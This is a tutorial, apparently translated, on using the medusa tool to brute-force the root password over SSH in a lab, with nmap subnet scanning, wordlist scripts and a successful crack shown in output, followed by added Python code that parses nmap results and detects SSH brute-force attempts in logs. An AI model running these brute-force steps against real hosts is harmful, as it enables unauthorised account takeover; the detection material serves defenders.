Detailed medusa tutorial

############################################################
#Notes on using medusa to brute-force the password of the Linux superuser account root:
#
#By: nortorm
#
###########################################################
#Preparation (download the software below):
   1 wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
   2 wget http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
   3 the dictionary question (mkpasswd is used as the example here)

#Main text:
First install libssh2-1.2.6.tar.gz
   tar -zxvf libssh2-1.2.6.tar.gz -C /usr/src/
   cd /usr/src/libssh2-1.2.6/
   ./configure ; make ; make install

Next install medusa-2.0.tar.gz
   tar -zxvf medusa-2.0.tar.gz -C /usr/src/
   cd /usr/src/medusa-2.0/
   ./configure --prefix=$HOME/medusa-2.0 --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes
   make ; make install

#Dictionary (this part covers the case of particularly complex passwords; my experiment here does not need anything this elaborate.)
[root@www ~]# cat mkpasswd.sh
#!/bin/bash

touch /windows/mkpasswd.txt                # create mkpasswd.txt under the /windows directory

for i in $(seq 1 10000); do                # loop 10000 times, generating one password per iteration
   mkpasswd -l 8 >>/windows/mkpasswd.txt   # append each generated password to mkpasswd.txt
done

A quick look at the meaning of the commonly used options (man mkpasswd):
[root@www ~]# mkpasswd
oO@0thWi8
[root@www ~]# mkpasswd -l 8
d63tL(aT
[root@www ~]# mkpasswd -l 8 -d 3
8:nnV76W
[root@www ~]# mkpasswd -l 8 -c 2
STm[zj30
[root@www ~]# mkpasswd -l 8 -s 2
Nus8}\6E
[root@www ~]# mkpasswd -l 8 -s 2 -c 2 -C 2
e&{HN26d


usage: mkpasswd [args] [user]

where arguments are:

-l #      (length of password, default = 9)          password length, default 9 characters
-d #      (min # of digits, default = 2)             minimum number of digits, default 2
-c #      (min # of lowercase chars, default = 2)    minimum number of lowercase letters, default 2
-C #      (min # of uppercase chars, default = 2)    minimum number of uppercase letters, default 2
-s #      (min # of special chars, default = 1)      minimum number of special characters, default 1
-v        (verbose, show passwd interaction)         verbose: show the interaction with passwd


#Using the software:

[root@www ~]# medusa
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
 -h [TEXT]    : Target hostname or IP address
 -H [FILE]    : File containing target hostnames or IP addresses
 -u [TEXT]    : Username to test
 -U [FILE]    : File containing usernames to test
 -p [TEXT]    : Password to test
 -P [FILE]    : File containing passwords to test
 -C [FILE]    : File containing combo entries. See README for more information.
 -O [FILE]    : File to append log information to
 -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
 -M [TEXT]    : Name of the module to execute (without the .mod extension)
 -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                different parameter each time and they will all be sent to the module (i.e.
                -m Param1 -m Param2, etc.)
 -d           : Dump all known modules
 -n [NUM]     : Use for non-default TCP port number
 -s           : Enable SSL
 -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
 -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
 -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
 -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
 -t [NUM]     : Total number of logins to be tested concurrently
 -T [NUM]     : Total number of hosts to be tested concurrently
 -L           : Parallelize logins using one username per thread. The default is to process
                the entire username before proceeding.
 -f           : Stop scanning host after first valid username/password found.
 -F           : Stop audit after first valid username/password found on any host.
 -b           : Suppress startup banner
 -q           : Display module's usage information
 -v [NUM]     : Verbose level [0 - 6 (more)]
 -w [NUM]     : Error debug level [0 - 10 (more)]
 -V           : Display version
 -Z [TEXT]    : Resume scan based on map of previous scan

The listing above explains each of the command-line options.

[root@www ~]# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

 Available modules in "." :

 Available modules in "/usr/local/lib/medusa/modules" :
   + afp.mod : Brute force module for AFP sessions : version 2.0 (No usable LIBAFPFS. Module disabled.)
   + cvs.mod : Brute force module for CVS sessions : version 2.0
   + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
   + http.mod : Brute force module for HTTP : version 2.0
   + imap.mod : Brute force module for IMAP sessions : version 2.0
   + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
   + mysql.mod : Brute force module for MySQL sessions : version 2.0
   + ncp.mod : Brute force module for NCP sessions : version 2.0 (No usable LIBNCP. Module disabled.)
   + nntp.mod : Brute force module for NNTP sessions : version 2.0
   + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
   + pop3.mod : Brute force module for POP3 sessions : version 2.0
   + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 (No usable LIBPQ. Module disabled.)
   + rexec.mod : Brute force module for REXEC sessions : version 2.0
   + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
   + rsh.mod : Brute force module for RSH sessions : version 2.0
   + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
   + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
   + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
   + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
   + ssh.mod : Brute force module for SSH v2 sessions : version 2.0                               --the key point is that this module must load successfully, otherwise our experiment cannot run
   + svn.mod : Brute force module for Subversion sessions : version 2.0 (No usable LIBSVN. Module disabled.)
   + telnet.mod : Brute force module for telnet sessions : version 2.0
   + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
   + vnc.mod : Brute force module for VNC sessions : version 2.1
   + web-form.mod : Brute force module for web forms : version 2.1
   + wrapper.mod : Generic Wrapper Module : version 2.0

This listing shows the protocol modules medusa has loaded successfully.

Next, work out which host IPs we need.

[root@www ~]# nmap -sV -p22 -oG ssh 172.16.2.0/24

Scan the whole 172.16.2.0/24 range for machines with port 22 open, detect the service version, and save the result to the file ssh.


The nmap tool is needed here; a quick overview of the nmap options used:
usage: nmap

-sV  service version detection

-p22  port 22 only

-oG  save the output in grepable format to the named file


[root@www ~]# cat ssh
# Nmap 5.51 scan initiated Tue Dec  3 17:09:29 2013 as: nmap -sV -p22 -oG ssh 172.16.2.0/24
# Nmap done at Tue Dec  3 17:10:03 2013 -- 256 IP addresses (60 hosts up) scanned in 34.17 seconds

Extract the IPs from the output above into ssh1.txt. In grepable output every host has a Ports record of the form "Host: <ip> ()    Ports: 22/open/tcp//ssh//<banner>/", so grep 22/open keeps the hosts with port 22 open and awk '{print $2}' prints the second field, the IP:

[root@www ~]# grep 22/open ssh |awk '{print $2}' >>ssh1.txt
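The one-liner above keeps only the IP; an administrator doing the same inventory usually also wants the banner. The following Python parser for the -oG format is an added example, not part of the original tutorial: it extracts IP, hostname and version for every host with 22/tcp open and groups them by banner, so old builds such as OpenSSH 4.3 stand out. The sample output is constructed in the layout of the scan above, and the function names are my own.

```python
import re

# Constructed sample of nmap -oG (grepable) output in the same layout as the "cat ssh"
# listing above; the addresses and banners mirror the ones this tutorial's scan reported.
SAMPLE_OG = """\
# Nmap 5.51 scan initiated Tue Dec  3 17:09:29 2013 as: nmap -sV -p22 -oG ssh 172.16.2.0/24
Host: 172.16.2.1 ()    Status: Up
Host: 172.16.2.1 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.2 ()    Status: Up
Host: 172.16.2.2 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.13 ()    Status: Up
Host: 172.16.2.13 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.170 (www.nortorm.com)    Status: Up
Host: 172.16.2.170 (www.nortorm.com)    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
# Nmap done at Tue Dec  3 17:10:03 2013 -- 256 IP addresses (60 hosts up) scanned in 34.17 seconds
"""

# A "Ports:" record looks like: Host: <ip> (<hostname>)    Ports: <entry>[, <entry>...]
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\s+Ports: (.*)$")

def parse_og_ports(text):
    """Yield (ip, hostname, port, state, version) for every port entry in -oG output."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue            # "# Nmap ..." comments and "Status: Up" records carry no ports
        ip, hostname, ports = m.groups()
        for entry in ports.split(","):
            # Entry fields are slash-separated: port/state/proto/owner/service/rpc/version/
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            yield ip, hostname, int(fields[0]), fields[1], fields[6]

def open_ssh_inventory(text):
    """Return {ip: (hostname, version)} for hosts whose 22/tcp is reported open: the same
    selection as `grep 22/open ssh | awk '{print $2}'`, but keeping the banner."""
    return {ip: (host, ver) for ip, host, port, state, ver in parse_og_ports(text)
            if port == 22 and state == "open"}

def hosts_by_banner(text):
    """Group the open SSH hosts by banner so outdated builds (e.g. OpenSSH 4.3) stand out."""
    groups = {}
    for ip, (_, ver) in open_ssh_inventory(text).items():
        groups.setdefault(ver, []).append(ip)
    return groups
```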



Next I create a password dictionary by hand (you can find better dictionaries online) and run it as a script:
vim mkpasswd.sh

#!/bin/bash
#
# test dictionary
#
touch passwd.txt
echo $RANDOM >>passwd.txt   # $RANDOM yields a random number, appended to passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo 123456 >>passwd.txt    # this is my real password; lab environment *0*
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt

chmod +x mkpasswd.sh
./mkpasswd.sh

This generates my test dictionary passwd.txt automatically:

[root@www ~]# vim passwd.txt
[root@www ~]# vim mkpasswd.sh
[root@www ~]# chmod +x mkpasswd.sh
[root@www ~]# ./mkpasswd.sh
[root@www ~]# cat passwd.txt
3652
16777
10723
3963
25439
123456
29718
25915
1151
20323
9717




#Now for the most important part, the password cracking:

[root@www ~]# medusa -H ssh1.txt -u root -P passwd.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3652 (1 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 16777 (2 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 10723 (3 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3963 (4 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 25439 (5 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 11 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.2.170 User: root Password: 123456 [SUCCESS] --this line means the crack succeeded

Of course, this process is slow... it depends on your machine, the network, the number of dictionary entries and so on.
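Seen from the target, the run above leaves a burst of "Failed password for root" entries followed by an "Accepted password" in sshd's log. The following Python detector is an added example, not part of the original tutorial: it flags a source once it reaches a threshold of failed logins within a time window and then flags any later successful login from that source, which is how the ACCOUNT FOUND line above appears on the defender's side. The log lines are constructed in OpenSSH's syslog format, and the source addresses and function name are my own assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd syslog lines (OpenSSH's own message format) imitating what the target
# 172.16.2.170 would record while the medusa run above walks through passwd.txt.
SAMPLE_AUTH_LOG = """\
Dec  3 17:20:01 www sshd[4101]: Failed password for root from 172.16.2.9 port 40122 ssh2
Dec  3 17:20:01 www sshd[4103]: Failed password for root from 172.16.2.9 port 40123 ssh2
Dec  3 17:20:02 www sshd[4105]: Failed password for root from 172.16.2.9 port 40124 ssh2
Dec  3 17:20:02 www sshd[4107]: Failed password for root from 172.16.2.9 port 40125 ssh2
Dec  3 17:20:03 www sshd[4109]: Failed password for root from 172.16.2.9 port 40126 ssh2
Dec  3 17:20:03 www sshd[4111]: Accepted password for root from 172.16.2.9 port 40127 ssh2
Dec  3 17:25:40 www sshd[4201]: Failed password for admin from 172.16.2.31 port 51000 ssh2
Dec  3 17:31:12 www sshd[4210]: Accepted publickey for deploy from 172.16.2.3 port 52000 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) (password|publickey) for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_s=60, year=2013):
    """Return alerts: ("BRUTE_FORCE", src, user, count) once a source reaches `threshold`
    failures within `window_s` seconds, and ("SUCCESS_AFTER_BRUTE_FORCE", src, user, method)
    for any later successful login from that source. `year` is needed because syslog omits it."""
    failures = defaultdict(deque)   # src -> timestamps of its recent failed logins
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        result, method, user, src = m.group(2), m.group(3), m.group(4), m.group(5)
        if result == "Failed":
            q = failures[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()         # slide the window: forget failures older than window_s
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("BRUTE_FORCE", src, user, len(q)))
        elif src in flagged:
            # A success right after a burst of failures is the server-side view of the
            # "ACCOUNT FOUND" line above: treat it as a likely compromise, not a normal login.
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", src, user, method))
    return alerts
```

The same pattern is what fail2ban-style tooling automates; the window and threshold should be tuned to the host's normal login rate, and a lower threshold is appropriate for root, whose password login is better disabled outright.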
